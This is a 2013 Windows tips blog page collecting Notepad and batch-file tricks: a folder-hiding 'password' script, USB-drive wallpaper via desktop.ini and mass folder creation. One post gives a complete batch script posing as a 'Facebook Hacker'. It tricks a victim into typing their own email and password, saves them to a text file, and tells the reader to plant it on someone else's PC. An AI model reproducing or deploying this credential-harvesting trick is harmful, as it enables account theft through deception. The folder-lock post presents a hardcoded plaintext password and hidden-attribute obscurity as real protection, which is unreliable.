Showing posts with label Notepad. Show all posts
Showing posts with label Notepad. Show all posts

Wednesday, 16 October 2013

Hello guys,
     
      Everyone of us have some private files on systems which we do not want others to access them. Some hide those files on computer and some others use software to password protect them. But using a software leads to many problems like, getting system hang, also when we format our system the software will be removed automatically which causes your protected files to be public.
So , it is good to password protect a file on computer using a simple notepad trick by using .BAT extension.


What you need to do:


1.  Create a random folder with random name somewhere on your computer (for example, on your Desktop).
2.  Open Notepad and paste this code to your Notepad
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== ComputerWorldwithIT goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

3.  Change the word ComputerWorldwithIT (the word I marked in blue from the code), to your desired password. (For example: your name )

4.  Save As or Press (Ctrl + S) and name it "private.bat" (without the quotation marks), then click on the "Save as Type" option and choose "All Files (*.*)". Save it on the random folder that you created earlier.

5.  Close the notepad and open the folder that you created earlier, there should be some program named "Private.bat" that you created earlier, click on it and it should create a new folder named "Private" by itself. Do not change the folder name, as it may caused error.

6.  Now you have a random folder with a folder inside of it named "Private", put some private things maybe a pictures, videos, or anything in to the "Private" folder.

7.  When you're done, click twice on the "private.bat", and it should give you the option to lock the folder. Press "y" to lock the folder, don't be surprise once you agree to locked the folder, the "Private" folder will disappear along with anything you put inside of it.

8.  To spawn the folder, you need to click on the "private.bat" and enter your password, then the folder will spawn by itself. To lock and make the folder disappear again, all you need to do is click on the "private.bat" and an option appear that told you if you want to lock the folder again, you must press "y".

Note: for this trick to work 100% make sure that you computer in "don't show hidden files,folders,or drives" mode as below image




hope u like this post :)

How To Mack A Password Protected Folder Using Notepad

Saturday, 13 April 2013

How to Make Your PDF Files Speak to You.
How to Make Your PDF Files Speak to You.

How To Make Your PDF Files Speak in Adobe Reader

Sunday, 31 March 2013


Method 1:
When you open your USB Pen drive you always find a white background. But today I will show you how to set wallpapers in your Pen drive and make it colourful.
Just Copy the below code to notepad and save it as “desktop.ini“
[.ShellClassInfo]
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=127
ConfirmFileOp=0


[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=”YourPictureName.jpg
IconArea_Text=”0xFFFFFF”
VeBRA sources – don’t delete the tag above, it’s there for XXXXX purposes -
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}


[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=Folder.htt
PersistMonikerPreview=%WebDir%\folder.bmp

1. Replace “YourPictureName.jpg” with your picture name for example “SalmanKhan.jpg”
2. Put “desktop.ini” and your chosen picture in your USB Drive then Hide it.
3. Refresh and enjoy with your new background in the USB Drive.



Method 2:
1)First of all, you need to have these 2 important files.Get it here.
2)Unzip it. Actually there are 1 folder called folder settings and the other one is file called desktop.ini.Copy Folder Settings and desktop.ini into your selected location like C: partition or D: or pendrive.(where you want to change the background ).
3)FIY, usually this 2 files are invisible.So, in order to able to see them, go to Folder Option > View, check "Show Hidden files" and uncheck "Hide Protected Operating system files". Then click OK.
-By now,you should be able to look the files.
4)Now, the implementation part. Let say you want to put the scenery pics as a background in your pendrive. Go to Folder Settings and find the related picture in it.( actually, you can put any pics in this folder)
...for instance, the picture name is "scenery.jpg".
5)Now, open desktop.ini files by double clicking on it. Find this line :-
IconArea_Image=Folder Settings\nice.jpg

and replace it with:-

IconArea_Image=Folder Settings\scenery.jpg

6)DONE ! Refresh your Pendrive or partition.

Note:You can change background of any partition.

How To Set Wallpaper In Pen Drive

Sunday, 24 March 2013

Gyuzz want to know how to hack Facebook Account using a key logger

Create your own simple keylogger to hack Facebook Account.


1. Now u can create ur own simple keylogger just using Notepad .


2. the only work u have to do just install that keylogger on him/her
PC and tell them that this is a Facebook Hacker when they type there Email And Passwrd in it and u will get the Password from their PC.

Now start:-
(Facebook Hacker)
1. Create a folder named "perf_VC" in C: drive in your computer (do not use quotes).

2. Copy the following codes and paste it in notepad and save it as BATCH file (extension)is .bat .

@echo off
color a
title Facebook Hacking :Login:
cls
echo Please Enter Your Facebook Email Adress And Password
echo To Hack Any Facebook Account
echo.
echo.
cd "C:\perf_VC"
set /p user=Email ID:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >hACKED.txt
echo.
echo.
echo Press any key to continue

pause >n
echo Loading.....
echo.
echo.
echo Enter E-Mail Id Of Victim
set /p user=Email ID:
echo Username="%user%" >Victim.txt
echo.
echo Press any key to hack this ID
echo.
echo.
pause >
echo.
echo Processing...
echo.
echo.
echo.
echo.
echo.
pause >n

3.SAVE it in notepad as .bat file. (at anywhere SAY - Desktop).

4.Now open the that file

5.it will ask for your Facebook Email ID and Password.
Enter Email ID and Password in it.

6. Now it will ask for Victim EMAIL ID
Enter any ID( SAY - 111111@ds.com).

7. After completing this go to that Folder that you created earlier named Perf_VC

open this folder.

Automatically you will get the Email IDs and Password in TEXT file.

and ENJOY!!!!!

I HOPE U ALL like this awessome trick.


NOTE: Hacking is illegal , so this trick is for only for education purpose only, so that nobody can fool you.(I will not be responsible for any Harm


How to hack Facebook Account using a key logger

Friday, 15 February 2013

If your computer become slow, when you are working with many programs. It may be due to RAM because at that time RAM is full of remaining progress pieces which you are working with and you do not need them any more. So, if you can erase or delete those unnecessary pieces of information, your computer RAM will be cleaned and your computer will be speed up.



Cleaning RAM is very easy task here are steps for it, just follow them:

Cleaning a RAM without Software using Notepad

Monday, 4 February 2013


 Open notepad and then type MD 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

Now save this file as folder.bat. Close the notepad and open the saved file and see the magic. when you will doubble click on the saved file 20 folders will be created automatically in once..

CREATE FOLDER WITHOUT NAME:

Create a new folder and select rename option. remove existing name using backspace. Now Hold ALT key and type 255 using numpad. Now release ALT key and hit enter.
Done!!! A folder without name is created..

Amazing Computer Tricks

Wednesday, 30 January 2013



Hey Friends  today I am going to share few New Notepad hacks. They are really cool and crazy one's. So Please think atleast three to four times to use them on ur PC.

Notepad hack

 
Computer World With IT © 2015 - Designed by Templateism.com